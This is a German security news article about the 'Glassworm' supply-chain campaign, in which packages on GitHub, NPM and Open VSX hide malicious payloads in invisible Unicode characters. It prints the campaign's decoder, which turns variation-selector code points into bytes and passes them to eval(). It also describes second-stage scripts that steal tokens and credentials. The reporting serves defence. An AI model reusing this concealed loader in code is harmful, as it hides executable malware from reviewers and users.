Lieferkettenangriff nutzt unsichtbare Unicode-Zeichen zur Umgehung der Erkennung

Sicherheitsforscher von Aikido Security entdeckten einen Supply-Chain-Angriff, der unsichtbare Unicode-Codes verwendet, um bösartige Funktionen in Paketen zu verbergen, die auf GitHub, NPM und Open VSX hochgeladen wurden. Die Angreifergruppe, die den Namen Glassworm erhielt, lud vom 3. bis 9. März 2026 151 schädliche Pakete auf GitHub hoch.
Wie der unsichtbare Code funktioniert
Die schädlichen Pakete verwenden Unicode-Zeichen aus Public Use Areas (auch Public Use Access genannt), die in Editoren, Terminals und Code-Review-Oberflächen unsichtbar sind. Während der größte Teil des Codes normal erscheint, werden bösartige Funktionen und Nutzlasten mit diesen unsichtbaren Zeichen dargestellt, was manuelle Code-Reviews und herkömmliche Abwehrmaßnahmen unwirksam macht.
Die unsichtbaren Unicode-Zeichen repräsentieren jeden Buchstaben des US-Alphabets, wenn sie von Computern verarbeitet werden, erscheinen für Menschen jedoch als Leerzeichen oder leere Zeilen. JavaScript-Interpreter können diese Zeichen als normalen Code lesen und ausführen.
Technische Umsetzung
In einem analysierten Paket kodierten die Angreifer eine bösartige Nutzlast mit unsichtbaren Zeichen. Der Code enthält eine Dekodierfunktion, die die versteckten Bytes extrahiert und an eval() übergibt:
const s = v => [...v].map(
w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
null
)
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));
Der an s() übergebene Backtick-String erscheint in Viewern leer, enthält jedoch unsichtbare Zeichen, die zu einer vollständigen bösartigen Nutzlast dekodiert werden. Bei früheren Vorfällen holten dekodierte Nutzlasten Skripte der zweiten Stufe ab und führten sie aus, wobei Solana als Lieferkanal verwendet wurde, um Token, Zugangsdaten und Geheimnisse zu stehlen.
Angriffsmerkmale
Die schädlichen Pakete sind besonders schwer zu erkennen, weil:
- Die sichtbaren Teile des Codes von hoher Qualität und realistisch sind
- Umgebende Änderungen Dokumentationsanpassungen, Versionserhöhungen, kleine Refactorings und Fehlerbehebungen umfassen
- Die Änderungen stilistisch mit den Zielprojekten übereinstimmen
- Forscher vermuten, dass LLMs verwendet werden, um überzeugend legitime Pakete zu generieren
Diese Unicode-Technik wurde erstmals 2024 verwendet, um bösartige Prompts zu verbergen, die an KI-Engines gesendet wurden, und wurde seitdem für traditionelle Malware-Angriffe angepasst. Die 151 erkannten Pakete stellen wahrscheinlich nur einen kleinen Teil der Kampagne dar, da viele seit dem ersten Hochladen gelöscht wurden.
📖 Read the full source: HN AI Agents
👀 Siehe auch

MCPwner AI-Pentesting-Tool entdeckt mehrere 0-Day-Schwachstellen in OpenClaw
MCPwner, ein MCP-Server, der KI-Agenten für automatisierte Penetrationstests orchestriert, identifizierte mehrere kritische 0-Day-Schwachstellen in OpenClaw, darunter Umgebungsvariablen-Injektion, Berechtigungsumgehung und Informationsoffenlegung, die Standard-Scanner übersahen.

Frontier-KI hat CTF-Wettbewerbe gesprengt — GPT-5.5 meistert verrückte Pwn-Herausforderungen auf Anhieb
Claude Opus 4.5 und GPT-5.5 können mittelschwere bis schwere CTF-Herausforderungen autonom lösen und verwandeln Bestenlisten in ein Maß für Orchestrierung und Token-Budget statt für Sicherheitsfähigkeiten.

Kritische OpenClaw-Sicherheitslücken am 28.03.2026 gepatcht.
OpenClaw Version 2026.3.28 behebt 8 kritische Sicherheitslücken, die vom Ant AI Security Lab entdeckt wurden, darunter Sandbox-Umgehung, Rechteausweitung und SSRF-Risiken. Nutzer mit Versionen ≤2026.3.24 sollten sofort aktualisieren.

openclaw-credential-vault adressiert vier Wege der Anmeldedaten-Leckage in KI-Agenten
openclaw-credential-vault bietet Betriebssystemebenen-Isolierung und subprozessbezogene Anmeldedateninjektion, um vier häufige Wege der Anmeldedatenfreigabe in OpenClaw-Setups zu verhindern. Es umfasst eine Vier-Hook-Ausgabereinigung und funktioniert mit jedem CLI-Tool oder API.